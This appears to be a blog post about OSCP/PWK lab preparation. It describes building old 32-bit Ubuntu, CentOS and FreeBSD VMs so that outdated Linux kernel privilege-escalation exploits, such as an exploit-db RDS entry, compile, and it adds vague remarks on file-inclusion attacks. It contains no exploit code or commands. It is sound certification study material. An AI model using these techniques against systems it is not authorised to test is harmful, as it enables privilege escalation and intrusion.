Compiling kernel exploits for OSCP, who needs the PWK image?

The Problem – “PWK is outdated and old”

PWK being old and outdated is certainly one of the criticisms of the lab and certification; however, fundamentals are fundamental. There is no arguing though the operating systems in the labs are indeed outdated. Windows XP and some very old versions of Linux.

For the Linux kernel exploits that were required (I always tried kernel exploits last in the labs) people seem to struggle getting them to compile. After all, these exploits are more than ten years old and everyone is running a current version of Kali and some of us are running 64-bit because we love RAM. Of course these old exploits don’t like to be compiled on a modern version of Linux and especially don’t like to be compiled outside of a 32-bit environment.

Eventually I got tried of looking for the right gcc flags just to get an exploit to compile. I went down a different path.

gcc compile linux kernel exploits

Match your dev environment to the target environment

Instead of trying to get my 2019 Kali to compile an exploit like it’s 2011, I used the magic virtualization to build a few dev servers. That’s a fancy way to say I spun up three VMs of old version of Linux to use to compile. I just picked a few distros that were close to what I was running into in the PWK labs, downloaded the 32-bit ISOs, installed a VM, and set up Samba shares to move the files around.

If you feel bad for not “Penetrating With Kali” and needing to rely on another OS go ahead and read the PDF and it does discuss about matching your test environment to what you’re trying to attack. If I had taken the time to set up a few VMs at the beginning of my lab time I would have saved myself tens of hours in trying to get things to compile.

Ubuntu 11/12/14

I used Ubuntu 12 and 14, but using 11 would also be a solid choice. You can download 11 from here and 12 from here. Ubuntu servers seem to be everywhere in the labs.

CentOS 5

CentOS can be a little tricky to set up with a GUI since installing VMware tools without a disc just wasn’t fun. I used CentOS 5.3 and then I found a great way to fix your repos. This will be useful just in case you actually need to install a header file or something.

FreeBSD 9

Why just Linux, why not BSD too!? Since the FreeBSD FTPs are down and only the newer versions are available I went ahead and downloaded FreeBSD 9 from somewhere sketchy and then just verified the hashes on freebsd.org’s website.

Compiling https://www.exploit-db.com/exploits/15285 on Kali and Ubuntu
PC Load Letter? WTF does that mean?
Compiling Linux Kernel 2.6.36-rc8 - 'RDS Protocol' Local Privilege Escalation on Kali for PWK OSCP
It just works

LFI / RFI – I haven’t been PHPed like that since grade school

By far the thing I struggled the most with during the labs was local and remote file inclusion.

How did I overcome this? No clue. Just kept hitting buttons until it worked most of the time.

Paying attention to see if it needed a file extension or not helped. Sometimes you’ll need to include the .php and sometimes you don’t, sometimes it needs to be .txt instead. Why? Because php hates you, that’s why.